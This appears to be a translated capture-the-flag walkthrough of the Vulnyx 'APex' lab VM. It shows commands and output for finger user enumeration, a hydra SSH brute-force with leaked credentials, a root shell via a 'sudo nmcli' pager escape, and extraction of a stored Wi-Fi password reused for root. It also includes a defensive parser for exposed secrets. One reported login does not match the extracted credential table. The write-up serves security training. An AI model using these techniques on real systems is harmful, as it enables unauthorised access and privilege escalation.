Vulnyx APex Walkthrough (WP)
城南花已开 Lv5

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.163 08:00:27:92:cd:a4 (Unknown)
192.168.60.254 00:50:56:f9:b3:de (Unknown)

15 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.042 seconds (125.37 hosts/sec). 4 responded
export ip=192.168.60.163
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.163:22
Open 192.168.60.163:79
Open 192.168.60.163:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 15:53 CST
Initiating ARP Ping Scan at 15:53
Scanning 192.168.60.163 [1 port]
Completed ARP Ping Scan at 15:53, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:53
Completed Parallel DNS resolution of 1 host. at 15:53, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:53
Scanning 192.168.60.163 [3 ports]
Discovered open port 79/tcp on 192.168.60.163
Discovered open port 22/tcp on 192.168.60.163
Discovered open port 80/tcp on 192.168.60.163
Completed SYN Stealth Scan at 15:53, 0.09s elapsed (3 total ports)
Nmap scan report for 192.168.60.163
Host is up, received arp-response (0.00049s latency).
Scanned at 2025-01-22 15:53:39 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
79/tcp open finger syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:92:CD:A4 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Visit port 80 in the browser.

The All-Seeing Eye??

User Enumeration

A directory scan turns up a backup directory that requires HTTP Authorization to log in.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.163
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/backup (Status: 401) [Size: 461]
/server-status (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

At the same time, usernames can be discovered through port 79 (finger).

79 - Pentesting Finger - HackTricks

❯ nc -vn $ip 79
(UNKNOWN) [192.168.60.163] 79 (finger) open
root
Login: root Name: root
Directory: /root Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Alternatively, you can use a user-enumeration tool to find the root user. Not sure why the port suddenly closed on me; did I scan it too hard?

A reboot fixed it.

We get a "personal notes" entry, which is most likely a user credential.

❯ ./finger-user-enum.pl -u horus -t $ip
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )

----------------------------------------------------------
| Scan Information |
----------------------------------------------------------

Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Wed Jan 22 16:32:48 2025 #########
[email protected]: Login: horus Name: ..Directory: /home/horus Shell: /bin/bash..Never logged in...Mail forwarded to [email protected] mail...PGP key:..personal notes: H0Ru$$3rv3..No Plan...
######## Scan completed at Wed Jan 22 16:32:48 2025 #########
1 results.

1 queries in 1 seconds (1.0 queries / sec)

After logging in there is a db file.

file identifies it as an SQLite database; open it with an online tool:

SQL OnLine IDE

This yields new user credentials:
"1"	"anubis"	"L44NxKRnP7wxrBsxibpDORySkbEHRO"
"2" "amon" "xqRu08ZA3BihR4lKdJVYcP1x6HjZUf"
"3" "seth" "Hm7iYkj2jXDxPUwoW2COs42YjPaC4P"
"4" "osiris" "ITA96l3isg4uV2Sm8eYn41XVfxprFy"

Massage the exported rows into separate user and password lists, then brute-force SSH with hydra:

cat user.txt|awk '{print $2}'|tr -d '"'>users.txt
cat user.txt|awk '{print $3}'|tr -d '"'>pass.txt
❯ hydra -L users.txt -P pass.txt ssh://192.168.60.163
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-22 16:51:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries (l:4/p:4), ~1 try per task
[DATA] attacking ssh://192.168.60.163:22/
[22][ssh] host: 192.168.60.163 login: seth password: xqRu08ZA3BihR4lKdJVYcP1x6HjZUf
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-22 16:51:37

User Access

We now have the user seth with password xqRu08ZA3BihR4lKdJVYcP1x6HjZUf.

❯ ssh seth@$ip
[email protected]'s password:
seth@apex:~$ ls
user.txt
seth@apex:~$ cat user.txt
cb991ca285fc33a6d0ea1cab5f65d3ce

Root Privilege Escalation

Information gathering again.

The user turns out to have sudo rights. Running sudo directly errors out, because the binary lives under the sbin directory.

seth@apex:/tmp$ /usr/sbin/sudo -l
Matching Defaults entries for seth on apex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User seth may run the following commands on apex:
(root) NOPASSWD: /usr/bin/nmcli

This is because the user's PATH environment variable does not include /usr/sbin, where sudo is installed.

Privilege escalation via more

I got stuck here for a while: how do you escalate with nmcli? It is just a network management tool and has no command execution of its own.

But I noticed that the system will probably use more or less as the pager.

So I shrank the terminal window.

seth@apex:/tmp$ /usr/sbin/sudo /usr/bin/nmcli  connection show
NAME UUID TYPE DEVICE
MikroTik_AP e25d230b-bb26-4488-b2e0-1b94dac2b9cd wifi --

!/bin/bash

Typing that at the pager prompt executes the command and drops us into a root shell.

root@apex:/tmp# id
uid=0(root) gid=0(root) grupos=0(root)
root@apex:/tmp# cat /root/root.txt
c03c45d855d3b683b1637d3b93ead481

Intended Solution

That was a bit of a cheat, though, and not entirely along the author's intended path.

The normal line of thinking is: since you can see the MikroTik_AP wireless connection, there must be a configuration file for it, and that file has to contain the wireless password.

Otherwise, how would it connect?

seth@apex:/tmp$ find / -name "MikroTik_AP" 2>/dev/null
/etc/NetworkManager/system-connections/MikroTik_AP

The file cannot be read directly as seth, so use nmcli to view the configuration instead.

Before that, note that to see the password you have to add the --show-secrets parameter.

seth@apex:/tmp$ /usr/sbin/sudo nmcli connection show MikroTik_AP --show-secrets
connection.id: MikroTik_AP
connection.uuid: e25d230b-bb26-4488-b2e0-1b94dac2b9cd
connection.stable-id: --
connection.type: 802-11-wireless
connection.interface-name: --
connection.autoconnect: sí
connection.autoconnect-priority: 0
connection.autoconnect-retries: -1 (default)
connection.multi-connect: 0 (default)
connection.auth-retries: -1
connection.timestamp: 0
connection.read-only: no
connection.permissions: --
connection.zone: --
connection.master: --
connection.slave-type: --
connection.autoconnect-slaves: -1 (default)
connection.secondaries: --
connection.gateway-ping-timeout: 0
connection.metered: desconocido
connection.lldp: default
connection.mdns: -1 (default)
connection.llmnr: -1 (default)
connection.wait-device-timeout: -1
802-11-wireless.ssid: MikroTik_AP
802-11-wireless.mode: infrastructure
802-11-wireless.band: --
802-11-wireless.channel: 0
802-11-wireless.bssid: --
802-11-wireless.rate: 0
802-11-wireless.tx-power: 0
802-11-wireless.mac-address: --
802-11-wireless.cloned-mac-address: --
802-11-wireless.generate-mac-address-mask:--
802-11-wireless.mac-address-blacklist: --
802-11-wireless.mac-address-randomization:default
802-11-wireless.mtu: auto
802-11-wireless.seen-bssids: --
802-11-wireless.hidden: no
802-11-wireless.powersave: 0 (default)
802-11-wireless.wake-on-wlan: 0x1 (default)
802-11-wireless.ap-isolation: -1 (default)
802-11-wireless-security.key-mgmt: wpa-psk
802-11-wireless-security.wep-tx-keyidx: 0
802-11-wireless-security.auth-alg: --
802-11-wireless-security.proto: --
802-11-wireless-security.pairwise: --
802-11-wireless-security.group: --
802-11-wireless-security.pmf: 0 (default)
802-11-wireless-security.leap-username: --
802-11-wireless-security.wep-key0: --
802-11-wireless-security.wep-key1: --
802-11-wireless-security.wep-key2: --
802-11-wireless-security.wep-key3: --
802-11-wireless-security.wep-key-flags: 0 (ninguno)
802-11-wireless-security.wep-key-type: unknown
802-11-wireless-security.psk: WIFI_p@$$w0rd_is_$up3r_$3cur3
802-11-wireless-security.psk-flags: 0 (ninguno)
802-11-wireless-security.leap-password: --
802-11-wireless-security.leap-password-flags:0 (ninguno)
802-11-wireless-security.wps-method: 0x0 (default)
802-11-wireless-security.fils: 0 (default)
ipv4.method: auto
ipv4.dns: --
ipv4.dns-search: --
ipv4.dns-options: --
ipv4.dns-priority: 0
ipv4.addresses: --
ipv4.gateway: --
ipv4.routes: --
ipv4.route-metric: -1
ipv4.route-table: 0 (unspec)
ipv4.routing-rules: --
ipv4.ignore-auto-routes: no
ipv4.ignore-auto-dns: no
ipv4.dhcp-client-id: --
ipv4.dhcp-iaid: --
ipv4.dhcp-timeout: 0 (default)
ipv4.dhcp-send-hostname: sí
ipv4.dhcp-hostname: --
ipv4.dhcp-fqdn: --
ipv4.dhcp-hostname-flags: 0x0 (none)
ipv4.never-default: no
ipv4.may-fail: sí
ipv4.dad-timeout: -1 (default)
ipv4.dhcp-vendor-class-identifier: --
ipv4.dhcp-reject-servers: --
ipv6.method: auto
ipv6.dns: --
ipv6.dns-search: --
ipv6.dns-options: --
ipv6.dns-priority: 0
ipv6.addresses: --
ipv6.gateway: --
ipv6.routes: --
ipv6.route-metric: -1
ipv6.route-table: 0 (unspec)
ipv6.routing-rules: --
ipv6.ignore-auto-routes: no
ipv6.ignore-auto-dns: no
ipv6.never-default: no
ipv6.may-fail: sí
ipv6.ip6-privacy: -1 (unknown)
ipv6.addr-gen-mode: stable-privacy
ipv6.ra-timeout: 0 (default)
ipv6.dhcp-duid: --
ipv6.dhcp-iaid: --
ipv6.dhcp-timeout: 0 (default)
ipv6.dhcp-send-hostname: sí
ipv6.dhcp-hostname: --
ipv6.dhcp-hostname-flags: 0x0 (none)
ipv6.token: --
proxy.method: none
proxy.browser-only: no
proxy.pac-url: --
proxy.pac-script: --

We get the password WIFI_p@$$w0rd_is_$up3r_$3cur3.

Switch to root with it:
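As an added example (not from the original post), here is a small parser for an nmcli `connection show --show-secrets` dump that flags secrets NetworkManager stores in its own profile (flags value 0). A defender can run it over the same output to see exactly which profiles a sudo rule on nmcli would expose; the sample dump below is constructed from the fields shown above.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: a trimmed `nmcli connection show <id> --show-secrets` dump.
SAMPLE = """\
connection.id:                          MikroTik_AP
connection.type:                        802-11-wireless
802-11-wireless.ssid:                   MikroTik_AP
802-11-wireless-security.key-mgmt:      wpa-psk
802-11-wireless-security.wep-key0:      --
802-11-wireless-security.wep-key-flags: 0 (none)
802-11-wireless-security.psk:           WIFI_p@$$w0rd_is_$up3r_$3cur3
802-11-wireless-security.psk-flags:     0 (none)
802-11-wireless-security.leap-password: --
802-11-wireless-security.leap-password-flags:0 (none)
"""

# nmcli prints one "section.property: value" per line; the key never contains ':'.
LINE_RE = re.compile(r"^([\w.-]+):\s*(.*)$")

# Property names that hold wireless secrets (the value "--" means unset).
SECRET_SUFFIXES = ("psk", "leap-password", "wep-key0", "wep-key1", "wep-key2", "wep-key3")


def parse_nmcli(text: str) -> Dict[str, str]:
    """Turn the key/value lines of an nmcli dump into a dict."""
    props: Dict[str, str] = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            props[m.group(1)] = m.group(2).strip()
    return props


def flags_key(secret_key: str) -> str:
    """Map a secret property to its companion *-flags property (wep-key0 -> wep-key-flags)."""
    return re.sub(r"\d$", "", secret_key) + "-flags"


def stored_secrets(props: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (key, value) for secrets that are set and whose flags are 0.

    Flags 0 means NetworkManager keeps the secret itself, so anyone allowed to
    run `nmcli ... --show-secrets` as root can read it in plaintext.
    """
    found = []
    for key, value in props.items():
        if key.rsplit(".", 1)[-1] not in SECRET_SUFFIXES or value in ("", "--"):
            continue
        flags = props.get(flags_key(key), "0")
        if flags.split()[0] == "0":
            found.append((key, value))
    return found
```

Any profile that shows up in `stored_secrets` is a plaintext credential reachable through the sudo rule, which is why a NOPASSWD grant on nmcli deserves the same scrutiny as a grant on a shell.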

seth@apex:/tmp$ su root
Contraseña:
root@apex:/tmp# id
uid=0(root) gid=0(root) grupos=0(root)